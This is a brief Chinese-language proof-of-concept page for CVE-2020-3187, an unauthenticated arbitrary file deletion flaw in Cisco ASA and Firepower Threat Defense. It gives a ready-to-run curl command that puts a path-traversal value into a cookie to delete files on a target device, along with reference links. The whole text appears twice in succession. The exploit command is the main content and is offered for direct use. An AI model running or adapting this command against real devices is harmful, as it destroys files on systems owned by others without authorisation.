Cicso未經驗證任意文件刪除漏洞_CVE-2020-3187

# Cicso未經驗證任意文件刪除漏洞 CVE-2020-3187
==影響系統：==
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software

==POC:==
舉例爲刪除LOGO文件：

payload:
/+CSCOU+/csco_logo.gif

執行：
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html

==更多：==

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685

==影響系統：==
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software

==POC:==
舉例爲刪除LOGO文件：

payload:
/+CSCOU+/csco_logo.gif

執行：
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html

==更多：==

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
https://github.com/pry0cc/CVE-2020-3187
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html